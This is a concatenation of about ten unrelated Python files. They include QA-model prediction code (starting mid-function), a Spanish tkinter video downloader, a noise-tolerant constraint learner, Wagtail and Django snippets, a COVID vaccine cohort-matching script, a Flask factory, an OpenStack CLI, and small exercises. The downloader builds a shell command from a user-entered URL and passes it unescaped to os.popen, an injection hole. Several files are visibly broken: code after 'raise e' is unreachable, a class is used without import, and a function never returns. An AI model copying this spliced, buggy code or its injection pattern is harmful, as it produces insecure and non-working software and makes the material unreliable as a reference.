seen_predictions: continue seen_predictions[final_text] = True else: final_text = "" seen_predictions[final_text] = True nbest.append( _NbestPrediction( text=final_text, start_logit=pred.start_logit, end_logit=pred.end_logit)) # In very rare edge cases we could have no valid predictions. So we # just create a nonce prediction in this case to avoid failure. 
if not nbest: nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)) assert len(nbest) >= 1 return nbest def get_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case): """Get final predictions""" print("start to get predictions") example_index_to_features = collections.defaultdict(list) for feature in all_features: example_index_to_features[feature.example_index].append(feature) unique_id_to_result = {} for result in all_results: unique_id_to_result[result.unique_id] = result all_predictions = collections.OrderedDict() for (example_index, example) in enumerate(all_examples): features = example_index_to_features[example_index] prelim_predictions = get_prelim_predictions(features, unique_id_to_result, n_best_size, max_answer_length) nbest = get_nbest(args, prelim_predictions, features, example, n_best_size, do_lower_case) total_scores = [] best_non_null_entry = None for entry in nbest: total_scores.append(entry.start_logit + entry.end_logit) if not best_non_null_entry: if entry.text: best_non_null_entry = entry probs = _compute_softmax(total_scores) nbest_json = [] for (i, entry) in enumerate(nbest): output = collections.OrderedDict() output["text"] = entry.text output["probability"] = probs[i] output["start_logit"] = entry.start_logit output["end_logit"] = entry.end_logit nbest_json.append(output) assert len(nbest_json) >= 1 all_predictions[example.qas_id] = nbest_json[0]["text"] return all_predictions def write_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case): """Write final predictions to the json file and log-odds of null if needed.""" all_predictions = get_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case) return all_predictions def _get_best_indexes(logits, n_best_size): """Get the n-best logits from a list.""" index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True) best_indexes = [] for (i, score) in enumerate(index_and_score): if i >= n_best_size: break best_indexes.append(score[0]) return best_indexes def _compute_softmax(scores): """Compute softmax probability over raw logits.""" if not scores: return [] max_score = None for score in scores: if max_score is None or score > max_score: max_score = score exp_scores = [] total_sum = 0.0 for score in scores: x = math.exp(score - max_score) exp_scores.append(x) total_sum += x probs = [] for score in exp_scores: probs.append(score / total_sum) return probs
# /usr/bin/env python # -*- coding: utf-8 -*- # -*- encoding: utf-8 -*- """ Clase que controla los eventos del downloader además de las descargas de los videos y audios """ # __author__=jjr4p from io import BytesIO from PIL import ImageTk from PIL.Image import open as opp from tkinter import Toplevel, NORMAL, DISABLED, END, INSERT, TclError, IntVar from tkinter import messagebox as msg from tkinter import ttk from tkinter import filedialog import pafy import requests import os import threading import platform class Controlador: def setVista(self, vista): """ Define la vista que será controlada """ self.vista = vista self.recurso = None def cargarurl(self): """ Método encargado de llamar al método cargarInfo en un hilo distinto """ self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) if platform.system() == 'Windows': self.vista.config(cursor="wait") if "facebook" in self.vista.url.get(): self.t = threading.Thread(target=self.cargarFB) self.t.start() else: try: self.recursoPL = pafy.get_playlist(self.vista.url.get()) self.t = threading.Thread(target=self.cargarPlayList) self.t.start() except ValueError as e: try: self.recurso = pafy.new(self.vista.url.get()) self.t = threading.Thread(target=self.cargarInfo) self.t.start() except ValueError as e: mensaje = "La url es inválida o no se encuentra conectado " mensaje += "a internet, intentelo nuevamente." msg.showerror("Error", mensaje) self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarInfo(self): self.vista.notebook.select(self.vista.tab1) """ Método encargado de obtener información dela url ingresada """ info = "" info += "■Título: " + self.recurso.title+"\n" info += "■Duración: " + self.recurso.duration+"\n" info += "■Autor: " + self.recurso.author+"\n" try: info += "■Categoría: " + self.recurso.category+"\n" except: info += "■Categoría: No disponible\n" pass info += "■Likes: " + str(self.recurso.likes)+"\n" info += "■Dislikes: " + str(self.recurso.dislikes)+"\n" mejor = self.recurso.getbest() info += "■Mejor resolución: " + mejor.resolution+"\n" info += "■Mejor formato: " + mejor.extension if self.recurso.bigthumb != '': response = requests.get(self.recurso.bigthumb) img_data = response.content img = ImageTk.PhotoImage(opp(BytesIO(img_data))) self.vista.imagen.config(text="", image=img) self.vista.imagen.image = img self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.insert(INSERT, info) self.vista.text.config(state=DISABLED) self.cargarLista() self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarLista(self): """ Método encargado de obtener los formatos disponibles del video que se busca """ self.streams = self.recurso.streams self.vista.listbox.delete(0, END) i = 0 texto_a_insertar = "{}) Resolución: {}, Extensión: {}, Tamaño: {}" for s in self.streams: i += 1 tamanio = str("%.2f MB." 
% (s.get_filesize()/(1024**2))) self.vista.listbox.insert(END, texto_a_insertar.format( i, s.resolution, s.extension, tamanio)) def descargaVideo(self): """ Método encargado de llamar al método __descargaVideo, según lo seleccionado por el usuario además que se ejecuta en un hilo distinto """ index = self.vista.listbox.curselection() if len(index) > 0: self.seleccion = self.streams[index[0]] self.size = self.seleccion.get_filesize() self.mostrarDialogo() t = threading.Thread(target=self.__descargarVideo) t.start() self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) else: msg.showerror("Error", "Se debe seleccionar un video de la lista.") def __descargarVideo(self): """ Método que descarga el video seleccionado y muestra la carga """ self.d = True try: file = self.seleccion.download( quiet=True, filepath=self.vista.path.get(), callback=self.callback) except Exception as e: raise e msg.showerror("Error", "El archivo ya existe.") self.top.destroy() self.d = False msg.showinfo("Mensaje", "Archivo descargado correctamente") self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.config(state=DISABLED) self.vista.listbox.delete(0, END) self.vista.url.set("") self.vista.imagen.config(text="No disponible", image='') self.vista.imagen.image = '' self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.config(cursor='') self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def descargaAudio(self): """ Método encargado de llamar al método __descargaAudio, que descarga la mejor resolución de audio, además que se ejecuta en un hilo distinto """ if self.recurso != None: t = threading.Thread(target=self.__descargaAudio) t.start() self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) self.mostrarDialogo() def __descargaAudio(self): """ Método que descarga el video seleccionado y muestra la carga """ self.bestaudio = self.recurso.getbestaudio(preftype='m4a') if self.bestaudio != None: self.d = True self.fileaudio = self.bestaudio.title+".m4a" self.size = self.bestaudio.get_filesize() try: self.bestaudio.download( quiet=True, callback=self.callback, filepath=self.vista.path.get()) msg.showinfo("Mensaje", "Archivo descargado correctamente.") except Exception as e: msg.showerror("Error", "El archivo ya existe.") self.top.destroy() self.d = False self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.config(state=DISABLED) self.vista.listbox.delete(0, END) self.vista.url.set("") self.vista.imagen.config(text="No disponible", image='') self.vista.imagen.image = '' self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.config(cursor='') self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def mostrarDialogo(self): """ Método que muestra la GUI de descarga del archivo """ self.top = Toplevel(self.vista) self.top.resizable(0, 0) self.top.iconbitmap('descarga.ico') geometry = "400x150+" geometry = "400x250+" geometry += str(int(self.vista.ancho/2)-150)+"+" geometry += str(int(self.vista.alto/2)-50) self.top.geometry(geometry) self.top.title("Descarga en progreso...") self.label = Label(self.top, text="Descargando: ", font=("Arial", 13)) self.label.place(x=5, y=15) 
self.label2 = Label(self.top, text="Tiempo: ", font=("Arial", 13)) self.label2.place(x=130, y=15) self.label3 = Label(self.top, text="Vel.: ", font=("Arial", 13)) self.label3.place(x=250, y=15) self.progress = IntVar() self.progress.set(0) self.progressbar = ttk.Progressbar(self.top, variable=self.progress) self.progressbar.place(x=30, y=60, width=320) self.bcancelar = ttk.Button(self.top, text="Cancelar") self.bcancelar.place(x=150, y= 100) self.top.iconbitmap('descarga.ico') self.progress = IntVar() self.progress.set(0) self.progressbar = ttk.Progressbar(self.top, variable=self.progress) self.label = ttk.Label(self.top, text="Descargando: ", font=("Arial", 14)) self.label.place(x=5, y=15) self.label2 = ttk.Label(self.top, text="Tiempo restante: ", font=("Arial", 14)) self.label2.place(x=5, y=65) self.label3 = ttk.Label(self.top, text="Velocidad: ", font=("Arial", 14)) self.label3.place(x=5, y=115) self.progressbar.place(x=30, y=160, width=320) if platform.system() == 'Windows': self.vista.config(cursor="wait") self.bcancelar = ttk.Button(self.top, text="cancelar", command=self.cancelar) self.bcancelar.place(x=150,y=200) self.top.transient(self.vista) self.top.config(bg="#4C4C4D") def iniciar(self): """ Método que muestra la GUI """ self.vista.mainloop() def cancelar(self): pass def borrarurl(self): """ Método borra la url ingresada """ self.vista.url.set("") def callback(self, total, recvd, ratio, rate, eta): """ Método que controla la descarga del archivo """ carga = int(ratio*100) self.progressbar.step(carga - self.progress.get()) self.progress.set(carga) self.label.config(text="Descarga: "+str(carga)+" %") self.label2.config(text="Tiempo restante: "+str("%.0f" % (eta))+" segundos") self.label3.config(text="Velocidad: "+str("%.2f" % (rate/1024))+" Mb/s") def cambiaPath(self): """ Método para cambiar la carpeta destino """ path = filedialog.askdirectory() if path != None and path != '': self.vista.path.set(path) def copia(self, event): """ Método que pega la url del portapapeles """ self.vista.url.set(self.vista.clipboard_get()) def cargarPlayList(self): self.vista.notebook.select(self.vista.tabPL) self.disponibles = self.recursoPL['items'] self.vista.listPL.delete(0, END) i = 0 texto_a_insertar = "{}) Título: {}, Duración: {}" for s in self.disponibles: i += 1 insertar = texto_a_insertar.format(i, s['pafy'].title[:40]+"...", s['pafy'].duration) try: self.vista.listPL.insert(END,insertar) except TclError as e: pass self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarInfoDesdePL(self): index = self.vista.listPL.curselection() if len(index) > 0: if platform.system() == 'Windows': self.vista.config(cursor="wait") self.recurso = self.recursoPL['items'][index[0]]['pafy'] self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) self.t = threading.Thread(target=self.cargarInfo) self.t.start() else: msg.showerror("Error", "Se debe seleccionar un video de la lista.") def cargarFB(self): try: rpta = msg.askyesno("Pregunta", "No se puede obtener información "+ "de un video de facebook, desea continuar con la descarga?") if rpta: path = filedialog.asksaveasfilename() os.popen("facebook-dl.py {} hd {}".format(self.vista.url.get(),path)) msg.showinfo("Mensaje", "Archivo descargado correctamente.") except: msg.showerror("Error", "El video no es público, 
o la url es inválida.") self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="")
import abc import logging import operator import warnings from fractions import Fraction from typing import List, Sequence, Optional, Tuple import numpy as np # type: ignore import pandas as pd # type: ignore from pathos.pools import ProcessPool import statsmodels.api as sm # type: ignore import statsmodels.tools.sm_exceptions as sm_exc import sympy as sym from mockdown.constraint import IConstraint from mockdown.learning.noisetolerant.types import NoiseTolerantLearningConfig from mockdown.learning.types import IConstraintLearning, ConstraintCandidate from mockdown.model import IView from mockdown.types import unopt, PROFILE logger = logging.getLogger(__name__) class NoiseTolerantLearning(IConstraintLearning): def __init__(self, templates: Sequence[IConstraint], samples: List[IView[sym.Number]], config: Optional[NoiseTolerantLearningConfig] = None) -> None: self.templates = [tpl for tpl in templates if tpl.op is operator.eq] self.samples = samples if not config: config = NoiseTolerantLearningConfig(sample_count=len(samples)) self.config = config def learn(self) -> List[List[ConstraintCandidate]]: if False: # len(self.templates) >= 100 and not PROFILE: # profiler can't see inside multiprocessing with ProcessPool() as pool: return list(pool.map(self.learn_one, self.templates)) else: return list(map(self.learn_one, self.templates)) def learn_one(self, template) -> List[ConstraintCandidate]: data = self._template_data(template) model = NoiseTolerantTemplateModel(template, data, self.config) return model.learn() if not model.reject() else [] def _template_data(self, template: IConstraint) -> pd.DataFrame: """Extract the data for a given template from the samples.""" if template.kind.is_constant_form: columns = [template.y_id] else: columns = [template.y_id, unopt(template.x_id)] rows = [] for sample in self.samples: rows.append([unopt(sample.find_anchor(col)).value for col in columns]) return pd.DataFrame(rows, columns=list(map(str, columns)), dtype=np.float) class NoiseTolerantTemplateModel(abc.ABC): def __init__(self, template: IConstraint, data: pd.DataFrame, config: NoiseTolerantLearningConfig): self.template = template self.data = data self.config = config # todo: add synthetic extra data point in 1-ex case. x = sm.add_constant(self.x_data, has_constant='add') y = self.y_data kind = self.template.kind sc = self.config.sample_count # If we only have one example, append the sensible default which preserves # the simple learning behavior. This is not well-defined (or necessary) when # we have been given two samples. if self.config.sample_count == 1: if kind.is_constant_form: x.loc[sc] = [1, 0] y.loc[sc] = y.loc[0] elif kind.is_mul_only_form: x.loc[sc] = [1, 0] y.loc[sc] = 0 elif kind.is_add_only_form: x.loc[sc] = [1, 0] y.loc[sc] = y.loc[0] - x[self.x_name].loc[0] else: # full y = a x + b form... raise Exception("A general form constraint should not be instantiated for only one example!") """ This is an absolutely horrendous hack. Basically, due to numerical error, sometimes the noise here isn't quite enough, and statsmodels will throw a PerfectSeparationError. (Context: statsmodels doesn't handle the perfect fit case, so we add very tiny noise to get around that limitation.) If so... we just try again. """ while True: try: x_smudged, y_smudged = self._smudge_data(x, y) self.model = sm.GLM(y_smudged, x_smudged) with warnings.catch_warnings(): """ What's up with these fit_constrained calls? fit_constraints((R, q)) solves such that R params = q. 
The order of R is (k, a_1, ..., a_n), where the regression is a_1*x_1 + ... a_n*x_n + k. For our purposes (y = a x + b) R corresponds to (b, a). For a constant form (y = b) it must hold that: - (0 * b) + (1 * a) = 0 That is: - 0 * b = 0 (trivially always holds, unconstrained) - 1 * a = 0 (multiplier must be zero.) For a multiplicative form (y = a x) it must hold that: - (1 * b) + (0 * a) = 0 That is: - 1 * b = 0 (constant must be zero.) - 0 * a = 0 (trivially always holds, unconstrained) for an additive form (y = a x + b) it must hold that: - (0 * b) + (1 * a) = 1 That is: - 1 * a = 1 (multiplier must be 1) """ # To ignore a harmless warning from statsmodels. – Dylan warnings.simplefilter("ignore") if kind.is_constant_form: self.fit = self.model.fit_constrained(((0, 1), 0)) elif kind.is_mul_only_form: self.fit = self.model.fit_constrained(((1, 0), 0)) elif kind.is_add_only_form: self.fit = self.model.fit_constrained(((0, 1), 1)) else: # full y = a x + b form... self.fit = self.model.fit() except sm_exc.PerfectSeparationError: logger.warn(f"Perfect separation error for {self.template}f with data:\n{self.data}") continue else: break def _smudge_data(self, x, y): x_noise = np.random.randn(len(x)) * 1e-5 x_smudged = x.add(x_noise, axis=0) y_noise = np.random.randn(len(y)) * 1e-5 y_smudged = y.add(y_noise, axis=0) return x_smudged, y_smudged @property def x_name(self) -> str: return str(self.template.x_id) if self.template.x_id else '__dummy__' @property def y_name(self) -> str: return str(self.template.y_id) @property def x_data(self) -> pd.Series: if self.template.kind.is_constant_form: return pd.Series(np.zeros(self.config.sample_count), name=self.x_name) return self.data[self.x_name] @property def y_data(self) -> pd.Series: return self.data[self.y_name] def likelihood_score(self, a: int, b: Fraction, scale=1) -> float: return self.model.loglike((b, a), scale=scale) def candidates(self) -> pd.DataFrame: a_space, b_space = self.config.a_space, self.config.b_space aconf_l, aconf_u = self.a_confint() bconf_l, bconf_u = self.b_confint() a_cands_ixs = np.where(np.logical_and(aconf_l <= a_space, a_space <= aconf_u))[0] if len(a_cands_ixs) == 0: # The confidence interval is _between_ two candidates, find its upper/lower candidate bounds. a_ix = np.searchsorted(a_space, (aconf_l + aconf_u) / 2) a_cands_ixs = [max(0, a_ix - 1), min(a_ix, len(a_space) - 1)] a_cands = a_space[a_cands_ixs] b_cands_ixs = np.where(np.logical_and(bconf_l <= b_space, b_space <= bconf_u))[0] if len(b_cands_ixs) == 0: # The confidence interval is _between_ two candidates, find its upper/lower candidate bounds. 
b_ix = np.searchsorted(b_space, (bconf_l + bconf_u) / 2) b_cands_ixs = [max(0, b_ix - 1), min(b_ix, len(b_space) - 1)] b_cands = b_space[b_cands_ixs] return pd.DataFrame([(a, b) for a in a_cands for b in b_cands], columns=['a', 'b']) def learn(self) -> List[ConstraintCandidate]: candidates = self.candidates() # scale = 1 candidates['glm_loglike'] = candidates.apply(lambda c: self.likelihood_score(*c), axis=1) candidates['glm_score'] = np.exp(candidates['glm_loglike']) candidates['glm_score'] /= candidates['glm_score'].sum() candidates['pri_score'] = self.a_prior(candidates['a']) candidates['pri_score'] /= candidates['pri_score'].sum() candidates['score'] = candidates['glm_score'] * candidates['pri_score'] candidates['log_score'] = np.log(candidates['score']) logger.debug(f"CANDIDATES:\n{candidates}") return list(candidates.apply(lambda row: ConstraintCandidate( self.template.subst(a=sym.Rational(row['a']), b=sym.Rational(row['b'])), row['score']), axis=1)) def reject(self) -> bool: x, y = self.x_data, self.y_data if np.var(x) == 0 and not np.std(y) < self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, no x variance and stdev of y is too high: " f"{np.std(y)} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True if np.var(y) == 0 and not np.std(x) < self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, no y variance and stdev of x is too high: " f"{np.std(x)} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True # Are the residuals small? resid_std = np.std(self.fit.resid_response) if resid_std > self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, stdev of residuals too high: {resid_std} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True self._log_accepted() return False def a_confint(self) -> Tuple[float, float]: # max_d = self.config.max_denominator al, au = self.fit.conf_int(alpha=self.config.a_alpha).iloc[1] return al, au def b_confint(self) -> Tuple[float, float]: bl, bu = self.fit.conf_int(alpha=self.config.b_alpha).iloc[0] return bl, bu def a_prior(self, a: np.ndarray) -> float: return self.config.depth_prior[np.searchsorted(self.config.a_space, a)] def _log_accepted(self) -> None: a_bounds_str: str al, au = self.a_confint() a_bounds_str = f"= {al}" if al == au else f"∈ [{al}, {au}]" bl, bu = self.b_confint() b_bounds_str = f"= {bl}" if bl == bu else f"∈ [{bl}, {bu}]" logger.debug(f"ACCEPTED: `{self.template}`") logger.debug(f"DATA:\n{self.data}") logger.debug(f"BOUNDS: a {a_bounds_str}, b {b_bounds_str}")
from django.utils.html import escape

from wagtail.core.models import Page


class PageLinkHandler:
    """
    PageLinkHandler will be invoked whenever we encounter an <a> element in HTML content
    with an attribute of data-linktype="page". The resulting element in the database
    representation will be:
    <a linktype="page" id="42">hello world</a>
    """

    @staticmethod
    def get_db_attributes(tag):
        """
        Given an <a> tag that we've identified as a page link embed (because it has a
        data-linktype="page" attribute), return a dict of the attributes we should
        have on the resulting <a linktype="page"> element.
        """
        return {'id': tag['data-id']}

    @staticmethod
    def expand_db_attributes(attrs):
        try:
            page = Page.objects.get(id=attrs['id'])

            attrs = 'data-linktype="page" data-id="%d" ' % page.id
            parent_page = page.get_parent()
            if parent_page:
                attrs += 'data-parent-id="%d" ' % parent_page.id

            return '<a %shref="%s">' % (attrs, escape(page.specific.url))
        except Page.DoesNotExist:
            return "<a>"


def page_linktype_handler(attrs):
    try:
        page = Page.objects.get(id=attrs['id'])
        return '<a href="%s">' % escape(page.specific.url)
    except Page.DoesNotExist:
        return "<a>"
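# --- Hedged usage sketch (added for illustration, not part of the original module). ---
# It assumes a configured Django/Wagtail project and an existing Page; `page_pk` is a
# hypothetical argument, not something defined above. It only shows how the stored
# attribute dict is expanded back into editor-side and front-end HTML by the handlers.
def _demo_expand_page_link(page_pk):
    """Expand a stored page link for the editor and for the front end."""
    db_attrs = {'id': page_pk}  # attributes as stored in the rich text representation
    editor_html = PageLinkHandler.expand_db_attributes(db_attrs)
    frontend_html = page_linktype_handler(db_attrs)
    return editor_html, frontend_html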
from django.conf.urls import url

from profiles import views

# Django's patterns() helper is deprecated (removed in 1.10); a plain list of url()
# entries is the supported form.
urlpatterns = [
    url(r'^(?P<username>[\w@.-]+)/$',
        views.profile_detail,
        {'template_name': 'profiles/public/profile_detail.html'},
        name='profiles_profile_detail'),
]
''' After data is prepared, apply the cohort conditions and the matching process. The data generated by this class are composed by two files: - Table of pairs with the date of the events of interest. - Table containing general information of all individuals considered for the matching process (the individuals in the first table forms a subset of this table). ''' import numpy as np import pandas as pd import datetime as dt from tqdm import tqdm import lib.aux_utils as aux import lib.utils as utils import lib.matching_utils as matching_utils from collections import defaultdict from dateutil.relativedelta import relativedelta col_tests = ["Data da Solicitação(GAL)", "Data da Coleta(GAL)"] class DefineCohortSettings: def __init__(self, vacineja_df, init_cohort, final_cohort): ''' Description. Args: vacineja_df: pandas.DataFrame. init_cohort: datetime.date. final_cohort: datetime.date. ''' self.vacineja_df = vacineja_df.copy() self.init_cohort = init_cohort self.final_cohort = final_cohort def define_eligibility(self, partial=14, fully=14, return_=True): ''' Define new columns in the 'Vacine Já' database regarding the eligibility criteria to an individual be part of the cohort. Args: partial: Integer. fully: Integer. return_: Bool. Return: self.vacineja_df. If return_=True. ''' subset = ["data D1(VACINADOS)", "data D2(VACINADOS)"] self.vacineja_df["VACINA STATUS - COORTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_when_vaccine(x, self.init_cohort, self.final_cohort), axis=1) self.vacineja_df["IMUNIZACAO MAXIMA ATE FIM DA COORTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_immunization(x, self.init_cohort, self.final_cohort, partial, fully), axis=1) # --> Eligibility by tests subset = ["Data da Solicitação(GAL)", "Data da Coleta(GAL)", "RESULTADO FINAL GAL-INTEGRASUS"] self.vacineja_df["ELIGIBILIDADE TESTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_eligible_test(x, self.init_cohort, self.final_cohort), axis=1) subset = "IMUNIZACAO MAXIMA ATE FIM DA COORTE" aptos = ["NAO VACINADO", "PARCIALMENTE IMUNIZADO", "TOTALMENTE IMUNIZADO", "VACINADO SEM IMUNIZACAO"] self.vacineja_df["ELIGIBILIDADE COORTE GERAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x in aptos else "NAO APTO") # --> Eligibility for cases partial self.vacineja_df["ELIGIBILIDADE EXPOSTO PARCIAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x=="PARCIALMENTE IMUNIZADO" else "NAO APTO") # --> Eligibility for cases fully self.vacineja_df["ELIGIBILIDADE EXPOSTO TOTAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x=="TOTALMENTE IMUNIZADO" else "NAO APTO") # --> Create column with age based on the final of cohort. self.vacineja_df["idade"] = self.vacineja_df["data_nascimento"].apply(lambda x: relativedelta(self.final_cohort, x.date()).years) self.vacineja_df = self.vacineja_df.drop_duplicates(subset=["cpf"], keep="first") if return_: return self.vacineja_df def dynamical_matching(self, vaccine="CORONAVAC", age_thr=18, verbose=False, seed=0): ''' Perform the matching mechanism to find the case-control pairs. After selecting all individuals who took the specified vaccine at a day during cohort, we find for each day all possible controls for the cases. Matching is performed using sex and age variables. Args: vaccine: String. {"CORONAVAC", "ASTRAZENECA", "PFIZER"}. Vaccine to consider during matching for the cases. age_thr: Integer. Minimum age to consider during matching. verbose: Bool. seed: Integer. Random seed to change the order of possible control candidates. final_cohort: datetime.date. 
Return: events_df: df_pop: ''' if "ELIGIBILIDADE TESTE" not in self.vacineja_df.columns: return -1 datelst = utils.generate_date_list(self.init_cohort, self.final_cohort) # --> APPLY ESSENTIAL FILTERS # First, consider only people with age older or equal to 'age_thr' years old. df = self.vacineja_df[self.vacineja_df["idade"]>=age_thr] df = df[(df["OBITO INCONSISTENCIA COVID"]!="S") & (df["OBITO INCONSISTENCIA CARTORIOS"]!="S")] df = df[df["data aplicacao consistente(VACINADOS)"]!="N"] # Filter by eligibility df = df[(df["ELIGIBILIDADE TESTE"]=="APTO") & (df["ELIGIBILIDADE COORTE GERAL"]=="APTO")] # Obtain set of vaccinated and unvaccinated individuals. df_vaccinated = df[df["vacina(VACINADOS)"]==vaccine].dropna(subset=["data D1(VACINADOS)"], axis=0) df_unvaccinated = df[pd.isna(df["vacina(VACINADOS)"])] if verbose: print(f"Dimensão de elegíveis após aplicacão das condições: {df.shape}") print(f"Número restante de óbitos: {df['data_obito(OBITO COVID)'].notnull().sum()}") #print(f"Número restante de hospitalizados: {df['DATA HOSPITALIZACAO'].notnull().sum()}") #print(f"Número restante de testes: {df['DATA SOLICITACAO(TESTES)'].notnull().sum()}") print(f"Número de vacinados elegíveis para {vaccine}: {df_vaccinated.shape[0]}") # -- CREATE CONTROL RESERVOIR -- control_used = defaultdict(lambda: False) control_reservoir = defaultdict(lambda:[]) control_dates = { "D1": defaultdict(lambda:-1), "D2": defaultdict(lambda:-1), "DEATH COVID": defaultdict(lambda:-1), "DEATH GENERAL": defaultdict(lambda:-1) } df_pop = pd.concat([df_vaccinated, df_unvaccinated]) if verbose: print("Criando reservatório de controles ...") # Get the main outcomes' dates for each eligible individual of the cohort. col_names = { "D1": "data D1(VACINADOS)", "D2": "data D2(VACINADOS)", "OBITO COVID": "data_obito(OBITO COVID)", "OBITO GERAL": "data falecimento(CARTORIOS)" } print("Coletando datas para toda população considerada ...") matching_utils.collect_dates_for_cohort(df_pop, control_reservoir, control_dates, col_names) print("Coletando datas para toda população considerada ... Concluído.") matching_utils.rearrange_controls(control_reservoir, seed) print("Executando pareamento ...") pareados, matched = matching_utils.perform_matching(datelst, df_vaccinated, control_reservoir, control_used, control_dates, col_names) print("Executando pareamento ... Concluído.") events_df = matching_utils.get_events(df_pop, pareados, matched, col_names) df_pop["PAREADO"] = df_pop["cpf"].apply(lambda x: "SIM" if matched[x] else "NAO") return events_df, df_pop
from flask import Flask

from hymns import bp
from db import init_db


def create_app():
    # create and configure the app
    app: Flask = Flask(__name__)

    # create database connection
    with app.app_context():
        # store the db connection on the app object so the API blueprint has access
        # to the db instance; there may be a cleaner way, but this works for now
        app.db = init_db(app)

    # register the blueprint
    app.register_blueprint(bp)
    return app


if __name__ == "__main__":
    # actually start the development server instead of only building the app
    create_app().run()
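# --- Hedged usage sketch (added for illustration, not part of the original file). ---
# Exercises the factory with Flask's built-in test client, which avoids binding a
# server. The route path "/" is an assumption about what the `hymns` blueprint exposes.
def _smoke_test():
    test_app = create_app()
    with test_app.test_client() as client:
        response = client.get("/")  # hypothetical route provided by the blueprint
        print(response.status_code)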
# Copyright (c) 2017 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import sys

from cliff.app import App
from cliff.commandmanager import CommandManager
import os_client_config


def get_cloud_config():
    # TODO(johngarbutt) consider passing in argument parser
    return os_client_config.get_config()


def get_client(cloud_config, service_type):
    return cloud_config.get_session_client(service_type)


class CapacityApp(App):

    def __init__(self):
        super(CapacityApp, self).__init__(
            description='OS-Capacity (StackHPC) Command Line Interface (CLI)',
            version='0.1',
            command_manager=CommandManager('os_capacity.commands'),
            deferred_help=True,
        )

    def initialize_app(self, argv):
        self.LOG.debug('initialize_app')
        config = os_client_config.get_config()
        self.compute_client = config.get_session_client("compute")
        self.placement_client = config.get_session_client("placement")
        self.monitoring_client = config.get_session_client("monitoring")
        self.identity_client = config.get_session_client("identity")
        self.LOG.debug('setup Keystone API REST clients')

    def prepare_to_run_command(self, cmd):
        self.LOG.debug('prepare_to_run_command %s', cmd.__class__.__name__)

    def clean_up(self, cmd, result, err):
        self.LOG.debug('clean_up %s', cmd.__class__.__name__)
        if err:
            self.LOG.debug('got an error: %s', err)


def main(argv=sys.argv[1:]):
    myapp = CapacityApp()
    return myapp.run(argv)


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))
# Print the first n odd numbers.
n = int(input("Digite o valor de n: "))
impar = 1
i = 1
while i <= n:
    print(impar)
    impar = impar + 2
    i = i + 1
main = [
    {
        'category': 'Proof of Address',
        'note': 'Select all documents acceptable for proof of address verification.',
        'field': {
            'utility_bill': 'Utility Bill',
            'bank_statement': 'Bank Statement',
            'lease_or_rental_agreement': 'Lease or Rental Agreement',
            'municipal_rate_and_taxes': 'Municipal Rate and Taxes Invoice',
            'mortgage_statement': 'Mortgage Statement',
            'telephone': 'Telephone or Cellular Account',
            'insurance_policy': 'Insurance Policy Document',
            'retail_store': 'Statement of Account Issued by a Retail Store',
        },
    },
    {
        'category': 'Proof of Identity',
        'note': 'Select all documents acceptable for proof of identity verification.',
        'field': {
            'government_id': 'Government Issued ID',
            'passport': 'Passport',
            'drivers_license': 'Drivers License',
        },
    },
    {
        'category': 'Advanced Proof of Identity',
        'note': 'Select all documents acceptable for advanced proof of identity verification.',
        'field': {
            'id_confirmation': 'ID Confirmation Photo',
        },
    },
]

template_list = main


def choice_list():
    # Flatten every field into (key, label) pairs and append a catch-all "Other" entry.
    c = []
    for l in main:
        for k, v in l['field'].items():
            c.append([k, v])
    c.append(['other', 'Other'])
